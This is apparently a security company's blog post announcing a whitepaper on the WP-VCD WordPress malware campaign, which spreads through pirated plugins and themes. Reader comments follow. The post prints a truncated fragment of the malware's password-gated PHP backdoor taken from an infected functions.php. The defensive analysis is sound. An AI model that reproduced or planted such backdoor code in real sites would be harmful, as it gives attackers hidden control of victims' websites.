WP-VCD: The Malware You Installed On Your Own Site
One of the most prevalent malware infections facing the WordPress ecosystem in recent weeks is a campaign known as WP-VCD. Despite the relatively long existence of the campaign, the Wordfence threat intelligence team has associated WP-VCD with a higher rate of new infections than any other WordPress malware every week since August 2019, and the campaign shows no signs of slowing down.
In today’s post, we are publishing a comprehensive whitepaper analyzing WP-VCD. This whitepaper contains the full details of our research efforts into this prevalent campaign. It is intended as a resource for threat analysts, security researchers, WordPress developers and administrators, and anyone else interested in tracking or preventing the behavior associated with WP-VCD.
WP-VCD In Brief
The WP-VCD infection itself is spread via “nulled”, or pirated, plugins and themes distributed by a network of related sites, and it’s remarkable in the way it propagates once deployed. Behind the scenes, extensive command and control (C2) infrastructure and self-healing infections allow attackers to maintain a persistent foothold on these infected sites.
<?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '2f3ad13e4908141130e292bf8aa67474')) { $div_code_name="wp_vcd"; switch ($_REQUEST['action']) { case 'change_domain'; if (isset($_REQUEST['newdomain']))
The code snippet above was sourced from an infected functions.php file on a site compromised by WP-VCD. Due to the campaign’s prevalence, this example is likely immediately recognizable to anyone with experience handling WordPress malware infections.
Full details and code analysis of the WP-VCD campaign can be found in the full report.
Infrastructure, Monetization, and Attribution
At various points in its history, specific features have been added and removed from the malware, but most core components of WP-VCD have remained consistent. Monetization comes from two main sources: viral marketing activity intended to manipulate search engine results via black hat SEO, and malvertising code which creates potentially dangerous redirects and pop-up ads for users viewing a compromised site.
In the whitepaper, we provide some insight into the extent of WP-VCD’s infrastructure and monetization scheme. We also reveal data which provides attribution to the threat actor behind the campaign.
Indicators of Compromise (IOCs)
In order to aid the security community in the prevention, detection, and eradication of WP-VCD infections, we have provided an extensive list of IOCs associated with this campaign. We have also shared some YARA-compatible malware detection rules for public use in the identification of infected sites.
Read The Full Report
The full scope of our investigation into WP-VCD far exceeds that of a typical research blog post, so please read the complete whitepaper: WP-VCD: The Malware You Installed On Your Own Site.
Credits: WP-VCD whitepaper by Mikey Veenstra. Editing by Sean Murphy and Ramuel Gall.
Comments
9:27 am
You forgot to mention that this campaign is monitized by Propellerads, as all the advertisements domain names that infects the wp websites belongs to this company.
2:11 pm
The connection to Propeller Ads is explained in some detail in the full whitepaper.
9:53 am
It's amazing how coincidental it is that just this saturday morning I was looking into a website that had been giving this problem for quite a while, which I previously identified that its theme was nulled and the person that "developed" the website just stamped his name and info into the style.css. I had already on previous occations deactivated some unnecesary plugins that were old or no longer mantained, until the problem reappeared this saturday and I stumbled upong this code on functions.php, and after evaluating it looked really bad and was pairing to some "non-functioning" domains that semmed pretty fishy, so I just commented it out. I was just discussing this with a colleague an hour before I got the email notification from you guys. At least now I know this time I was right. Keep up the good work! Greets from Nicaragua!
11:57 am
Good work guys. Thanks for all you do!
3:27 pm
Should we search for this code within functions on all our sites manually, or is WF basic scanning for this?
2:10 pm
Hi Mike! Wordfence scans will identify these injections, both on Premium and Free sites.
8:11 pm
Thanks so much for this incredible work.
8:20 pm
complete whitepaper link above not wroking
2:11 pm
Hi Saurabh, we're not seeing any issues on our end. Can you give some further detail on what's happening when you click?